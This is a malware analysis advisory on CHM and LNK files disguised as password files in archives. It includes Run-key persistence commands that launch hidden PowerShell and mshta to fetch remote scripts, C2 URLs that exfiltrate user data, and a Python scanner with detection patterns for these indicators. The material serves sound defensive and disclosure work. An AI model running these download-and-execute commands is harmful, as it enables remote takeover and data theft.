Malware Distributed Disguised as a Password File
Last month, AhnLab Security Emergency response Center (ASEC) discovered a malware strain disguised as a password file and distributed together with a normal file inside a compressed archive. Because this type of malware travels alongside a normal file, it is difficult for users to notice that the file is malicious. The recently discovered malware came in CHM and LNK file formats. The CHM file is of the same type as the malware covered in the post below and is assumed to have been created by the same threat group.
CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft)
It is believed that the CHM and LNK files are distributed while compressed together with a normal, password-locked file. Users are led to execute the CHM or LNK files since they appear as if they hold the passwords for the password-protected Excel and HWP files.

Figure 1. Inside the compressed files
While the two types were distributed in the same format, the malicious behaviors ultimately executed suggest that they were created by different groups.
- CHM Type
Executing passwd.chm or Password.chm, as shown in Figure 1, displays the password to the locked file and simultaneously triggers the execution of the malicious script they contain.

Figure 2. Help screen displayed when passwd.chm is executed

Figure 3. Contents of Shoes.xlsx that is displayed upon unlocking the file

Figure 4. Help screen displayed when Password.chm is executed

Figure 5. Contents of 2020_normal_ko.hwp that is displayed upon unlocking the file
Below is an example of the malicious script found in the CHM files. Using the mshta process, it triggers the execution of an additional script hosted at a malicious URL.

Figure 6. Malicious script within the CHM file
The additional script run through the mshta process is in the same format as the command shared in the post <CHM Malware Disguised as Security Email from a Korean Financial Company: RedEyes(ScarCruft)>. This script is responsible for registering to the RUN key, receiving commands from the threat actor’s server, and transmitting the command execution results.

Figure 7. Malicious script found within 1.html
- RUN key registration
  - Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  - Value name: icxrNpVd
  - Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc.kr/skin/product/1.html
- C2
  - Receives threat actor’s commands: hxxp://shacc[.]kr/skin/product/mid.php?U=[Computer Name]+[Username]
  - Transmits command execution results: hxxp://shacc[.]kr/skin/product/mid.php?R=[Base64-encoded]

Figure 8. Malicious script found within 11.html
- RUN key registration
  - Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  - Value name: aeF
  - Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 496433 2.2.2.2 || mshta hxxp://141.105.65.165/data/11.html
- C2
  - Receives threat actor’s commands: hxxp://141.105.65.165/data//mid.php?U=[Computer Name]+[Username]
  - Transmits command execution results: hxxp://141.105.65.165/data/mid.php?R=[Base64-encoded]
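The Run-key values above share one shape: cmd.exe launching a hidden PowerShell with the execution policy bypassed, a long ping delay, and an `||` fallback into mshta fetching a remote HTML script. As an added example (not code from the ASEC post), the Python scanner below applies those indicators to constructed sample Run-key values; the two malicious entries reproduce the values from Figures 7 and 8 with their URLs kept defanged, and the benign `Updater` entry is invented as a control.

```python
import re

# Constructed sample Run-key values. The first two reproduce the values shown in
# Figures 7 and 8 (URLs kept defanged as on the page); "Updater" is a made-up
# benign entry used as a control.
SAMPLE_RUN_VALUES = {
    "icxrNpVd": r"c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo "
                r"-NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc.kr/skin/product/1.html",
    "aeF": r"c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo "
           r"-NonInteractive -ep bypass ping -n 1 -w 496433 2.2.2.2 || mshta hxxp://141.105.65.165/data/11.html",
    "Updater": r'"C:\Program Files\ExampleApp\updater.exe" /background',
}

# Accepts both live (http) and defanged (hxxp) URLs so the scanner works on IOC lists too.
URL_RE = re.compile(r"h(?:tt|xx)ps?://[^\s\"']+", re.I)

# Each indicator is (label, regex). A value is flagged when at least two match,
# so a lone hidden-window PowerShell or a lone ping does not trip the rule.
INDICATORS = [
    ("powershell_hidden", re.compile(r"powershell(?:\.exe)?\b.*-windowstyle\s+hidden", re.I)),
    # -ep / -ex / -exec / -executionpolicy are all accepted by PowerShell
    ("execution_policy_bypass", re.compile(r"\s-e(?:p|x(?:ec(?:utionpolicy)?)?)\s+bypass\b", re.I)),
    # ping with a multi-second -w timeout acts as a sleep, then || falls through
    ("ping_delay_then_fallback", re.compile(r"\bping\b.*-w\s+\d{4,}.*\|\|", re.I)),
    ("mshta_remote_url", re.compile(r"\bmshta(?:\.exe)?\s+h(?:tt|xx)ps?://", re.I)),
]


def analyze_run_value(data: str) -> dict:
    """Return matched indicator labels, extracted URLs and a verdict for one Run-key value."""
    hits = [label for label, rx in INDICATORS if rx.search(data)]
    urls = URL_RE.findall(data)
    return {"indicators": hits, "urls": urls, "suspicious": len(hits) >= 2}


def scan_run_key(values: dict) -> dict:
    """Map value name -> analysis for every Run-key value judged suspicious."""
    return {name: result for name, data in values.items()
            if (result := analyze_run_value(data))["suspicious"]}


if __name__ == "__main__":
    for name, result in scan_run_key(SAMPLE_RUN_VALUES).items():
        print(f"{name}: {result['indicators']} -> {result['urls']}")
```

On a live host, feed the function the values read from HKCU\...\Run (for example via `winreg`) instead of the constructed dictionary; the extracted URLs are the artifacts to block and hunt for in proxy logs.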
- LNK Type
The password.txt.lnk file shown in Figure 1 creates a text file containing the password and the malicious script file in the %temp% folder when executed.

Figure 9. Additional script and password.txt file that is created

Figure 10. Contents of PersonalDataUseAgreement.hwp that is displayed upon unlocking the file
As shown below, the VBS file is responsible for running the additional malicious script hosted at hxxp://hondes.getenjoyment[.]net/denak/info/list.php?query=1.

Figure 11. Created VBS file
Looking at the URL format, the LNK type is the same as the malware covered in the post below, which leads the team to believe that it was created by the same threat group.
https://asec.ahnlab.com/en/45658/
This type of malware can perform a variety of malicious behaviors according to the threat actor’s intentions. Furthermore, since various other threat groups are utilizing this method of distributing malware alongside a normal file, the team predicts there are other forms of this malware aside from the CHM and LNK files that have already been confirmed.

As shown above, since various forms of malware are being distributed to Korean users, users are advised to always check the sender of the emails they receive and be especially cautious about opening attached files.

[File Detection]
- Trojan/CHM.Agent (2023.03.08.03)
- Dropper/LNK.Agent (2023.02.28.00)